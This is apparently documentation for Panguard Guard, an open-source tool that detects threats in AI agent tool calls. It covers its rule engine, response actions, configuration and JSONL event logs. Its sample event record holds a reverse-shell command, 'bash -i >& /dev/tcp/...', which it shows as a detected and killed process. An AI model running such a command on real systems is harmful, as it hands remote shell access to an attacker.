Panguard Guard
Inline detection powered by a 5-agent pipeline. Guard watches AI agent tool calls, prompt flows, and skill behavior using ATR (Agent Threat Rules) plus behavioral baselines and on-device correlation — deterministic detection that blocks threats at runtime with no LLM in the detection path.
Free and open source under the MIT license. No account required.
Quick Start
panguard guard start
panguard guard status
panguard guard stop
By default, Guard starts in monitor mode. It logs threats but does not take automated action until you switch to protect mode.
5-Agent Pipeline
Every event flows through five specialised agents in sequence. Each agent enriches the event context before passing it to the next.
| Agent | Role | Description |
|---|---|---|
| Detect | Rule matching | Runs ATR rules against incoming telemetry. Produces raw alerts with severity and confidence scores. |
| Analyze | Correlation | Cross-correlates alerts on-device against behavioral baselines and temporal patterns. Adjusts confidence scores deterministically — no LLM involved. |
| Respond | Action execution | Selects and executes response actions based on confidence thresholds: auto-act, confirm, or notify. |
| Report | Structured logging | Writes JSONL event records, generates daily summaries, and pushes notifications to configured channels. |
| Chat | Interactive query | Natural-language interface for investigating past events, tuning rules, and asking follow-up questions about alerts. |
Detection Engines
Guard ships with three rule engines. All rules are updated automatically via the Panguard rule feed.
| Engine | Rules | Scope |
|---|---|---|
| ATR | 652 | Agent Threat Rules. Purpose-built for AI agent security: prompt injection, tool poisoning, MCP server abuse, credential exfiltration, context manipulation, and skill supply-chain attacks. |
Detection Stages
Every stage is deterministic and runs entirely on-device. No LLM sits in the detection path, so the same input always produces the same verdict — online or fully air-gapped.
Optionally, you can connect your own model — a cloud API (Anthropic, OpenAI, OpenAI-compatible) or a local Ollama — to add an advisory semantic layer. It is off by default and runs alongside the detection path, not inside it: it can explain a verdict or flag a novel pattern for your review, but it never auto-blocks. Deterministic detection stays the only thing that acts.
Stage 1: Rule Engine
650+ ATR regex rules resolve clear-cut matches instantly. Pure pattern matching, fully deterministic.
Stage 2: Behavioral Baseline
Events that rules do not match are checked against behavioral baselines and fingerprints recorded during onboarding. Flags drift from expected behavior. No data leaves the machine.
Stage 3: Correlation & AST
Surviving events are cross-correlated on-device: AST static analysis of skill code plus temporal correlation of behavioral signals, producing a reproducible confidence-scored verdict.
Response Actions
Guard supports six response actions. In protect mode, the Respond agent selects actions automatically based on confidence thresholds.
| Action | Description |
|---|---|
| block_ip | Add source IP to firewall deny list (iptables / pf). |
| kill_process | Terminate the offending process tree immediately. |
| quarantine_file | Move file to quarantine directory and strip execute permissions. |
| alert | Send notification via configured channels (Slack, email, webhook). |
| snapshot | Capture full process state, environment, and open file handles for forensics. |
| escalate | Forward event to SOC / human analyst for manual triage. |
Confidence Thresholds
Configuration
View and modify Guard configuration interactively:
panguard guard config
Key Options
| Option | Values | Default | Description |
|---|---|---|---|
| mode | monitor | protect | monitor | Monitor logs only, or actively respond to threats. |
| auto_response | true | false | false | Enable automated response actions in protect mode. |
| notification.slack | webhook URL | (none) | Slack incoming webhook for alert delivery. |
| notification.email | address | (none) | Email address for critical alert notifications. |
| notification.webhook | URL | (none) | Generic webhook endpoint for all events. |
panguard guard config set mode protect panguard guard config set auto_response true
panguard guard config set notification.slack https://hooks.slack.com/services/T.../B.../xxx
Monitoring and Logs
Guard writes structured event logs in JSONL format. Each line is a self-contained JSON object with timestamp, severity, rule ID, and action taken.
~/.panguard-guard/events.jsonl
Verbose Output
Use the --verbose flag to stream events to stdout in real time:
panguard guard start --verbose
Event Callback Format
Each event record follows this structure:
{
"timestamp": "2026-03-08T14:32:01.442Z",
"severity": "high",
"rule_id": "atr:suspicious_shell_execution",
"engine": "atr",
"layer": 1,
"confidence": 0.94,
"action": "kill_process",
"action_status": "executed",
"process": {
"pid": 48291,
"name": "bash",
"cmdline": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
},
"host": "prod-web-03"
}System Service
Install Guard as a system service so it starts automatically on boot. On Linux this creates a systemd unit; on macOS it creates a launchd plist.
panguard guard install
panguard guard uninstall
Both commands require root / administrator privileges. Guard will prompt for elevation if not already running as root.
Telemetry
Guard collects anonymous usage telemetry to improve rule quality and false-positive rates. No file contents, process arguments, or personally identifiable information is ever transmitted.
panguard guard start --no-telemetry
panguard guard --show-upload-data
Full details on data collection and retention are available in PRIVACY.md.
Platform Notes
| Feature | Linux | macOS | Windows |
|---|---|---|---|
| Core Guard daemon | Yes | Yes | Yes |
| ATR Rules | Yes | Yes | Yes |
| systemd service | Yes | -- | -- |
| launchd service | -- | Yes | -- |
For advanced configuration options, see the Advanced Setup Guide.
Start Protecting
Install Panguard and activate Guard in under a minute. Everything here — full scan and all rule-based protection layers — is free and open source today.
panguard guard start